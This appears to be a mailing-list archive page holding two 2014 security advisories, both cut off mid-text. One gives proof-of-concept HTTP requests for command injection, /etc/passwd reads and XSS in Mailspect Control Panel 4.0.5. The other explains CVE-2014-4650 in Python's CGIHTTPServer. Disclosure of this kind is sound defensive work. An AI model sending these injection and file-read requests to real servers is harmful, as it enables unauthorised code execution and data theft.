date:20140626

[FD] Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities

2014-06-26 Thread Onur Alanbel

Document Title:

Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities

Release Date:
===
June 21, 2014

Product  Service Introduction:

Mailspect is the email security and archiving brand of RAE Internet Inc., 
Tarrytown, New York.   The Mailspect product suite was launched 
in 2005 as a Control Panel for Open Source antispam and antivirus scanning 
engines such as Clamd and Spamassassin.  

Mailspect Defense offered easy-to-use configuration and update tools and an 
integrated Quaratine Solution and Mail Filter.  Subsequently, 
the Control Panel has expanded to include commercial scanning engines such as 
Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in 
content filers and reputation engines.

Abstract Advisory Information:
===
BGA Team discovered a remote code execution, two arbitrary file read and one 
cross site scripting vulnerability in Mailspect Control Panel 
4.0.5 web application.

Vulnerability Disclosure Timeline:
=
May 4, 2014 :   Contact with Vendor
May 16, 2014:   Vendor Response
June 21, 2014   :   Public Disclosure

Discovery Status:
=
Published

Affected Product(s):
===
Multilayered Email Security  Archive for Gateways, MTA's  Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected. 

Exploitation Technique:
==
RCE:Remote, Authenticated
AFR:Remote, Authenticated
XSS:Remote, Unauthenticated

Severity Level:
===
High

Technical Details  Description:

1. Sending a POST request to /system_module.cgi with config_version_cmd 
parameter's value set to a linux command group like whoami  
/tmp/who; /usr/local/MPP/mppd -v causes the former command's execution by 
sending a GET request (or simply visiting) to 
status_info.cgi?group=default page.
Other parameters with the suffix _cmd are probably vulnerable.

2. Sending a GET request to /monitor_logs_ctl.cgi with log_dir parameter's 
value set to / and log_file's value set to an arbitrary 
file name like /etc/passwd will cause the file's content's disclosure.

3. Sending a POST request to /monitor_manage_logs.cgi with log_file 
parameter's value set to an arbitrary file name like /etc/passwd 
will cause the file's content's disclosure.

4. Sending a POST request to /monitor_manage_logs.cgi with login parameter's 
value set to /scriptjs to be executedscript/ leads 
the Javascript code's execution.

Proof of Concept (PoC):
==
Proof of Concept RCE Request:

POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 
Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; 
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; 
t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
 
post=1config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xmlconfig_language=config_log_dir=%2Fvar%2Flog%2FMPP%2Fconfig_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-vconfig_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txtconfig_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppdconfig_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-sconfig_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-rconfig_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.shconfig_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.plconfig_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.plconfig_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.shconfig_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmittedconfig_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.shconfig_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmarkconfig_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshellconfig_fprot_dir=config_pid_file=%2Fvar%2Frun%2Fmppd.pidconfig_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdateconfig_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplogconfig_mpp_parser_time_interval=20page_refresh=60

2. Proof of Concept AFR Request 1:

GET 
/monitor_logs_ctl.cgi?log_file=/etc/passwdlog_dir=/mode=taillines=50filter=dummy=0.4426060212816081
 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 
Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:

[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution

2014-06-26 Thread RedTeam Pentesting GmbH

Advisory: Python CGIHTTPServer File Disclosure and Potential Code
  Execution

The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs. This may enable attackers to disclose a CGI
script's source code or execute arbitrary CGI scripts in the server's
document root.

Details
===

Product: Python CGIHTTPServer
Affected Versions:
  2.7 - 2.7.7,
  3.2 - 3.2.4,
  3.3 - 3.3.2,
  3.4 - 3.4.1,
  3.5 pre-release
Fixed Versions:
  2.7 rev b4bab0788768,
  3.2 rev e47422855841,
  3.3 rev 5676797f3a3e,
  3.4 rev 847e288d6e93,
  3.5 rev f8b3bb5eb190
Vulnerability Type: File Disclosure, Directory Traversal, Code Execution
Security Risk: high
Vendor URL: https://docs.python.org/2/library/cgihttpserver.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008
Advisory Status: published
CVE: CVE-2014-4650
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650


Introduction


The CGIHTTPServer module defines a request-handler class, interface
compatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits
behavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also
run CGI scripts.

(from the Python documentation)


More Details


The CGIHTTPServer module can be used to set up a simple HTTP server with
CGI scripts. A sample server script in Python may look like the
following:


#!/usr/bin/env python2

import CGIHTTPServer
import BaseHTTPServer

if __name__ == __main__:
server = BaseHTTPServer.HTTPServer
handler = CGIHTTPServer.CGIHTTPRequestHandler
server_address = (, 8000)
# Note that only /cgi-bin will work:
handler.cgi_directories = [/cgi-bin, /cgi-bin/subdir]
httpd = server(server_address, handler)
httpd.serve_forever()


This server should execute any scripts located in the subdirectory
cgi-bin. A sample CGI script can be placed in that directory, for
example a script like the following:


#!/usr/bin/env python2
import json
import sys

db_credentials = SECRET
sys.stdout.write(Content-type: text/json\r\n\r\n)
sys.stdout.write(json.dumps({text: This is a Test}))


The Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler
class which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:

class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
[...]
def do_GET(self):
Serve a GET request.
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()

def do_HEAD(self):
Serve a HEAD request.
f = self.send_head()
if f:
f.close()

def translate_path(self, path):
[...]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = os.getcwd()
[...]

The CGIHTTPRequestHandler class inherits, among others, the methods
do_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The
class overrides send_head() and implements several new methods, such as
do_POST(), is_cgi() and run_cgi():

class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
[...]
def do_POST(self):
[...]
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, Can only POST to CGI scripts)

def send_head(self):
Version of send_head that support CGI scripts
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)

def is_cgi(self):
[...]
collapsed_path = _url_collapse_path(self.path)
dir_sep = collapsed_path.find('/', 1)
head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]
if head in self.cgi_directories:
self.cgi_info = head, tail
return True
return False
[...]
def run_cgi(self):
Execute a CGI script.
dir, rest = self.cgi_info

[...]

# dissect the part after the directory name into a script name 
# a possible additional path, to be stored in PATH_INFO.
i = rest.find('/')
if i = 0:
script, rest = rest[:i], rest[i:]
else:
script, rest = rest, ''

scriptname = dir + '/' + script
scriptfile = self.translate_path(scriptname)
if not os.path.exists(scriptfile):
self.send_error(404, No such CGI script (%r) % scriptname)
return
if not os.path.isfile(scriptfile):
self.send_error(403, CGI script is not a plain file

[FD] Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities

[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution

2 matches

Site Navigation

Mail list logo

Footer information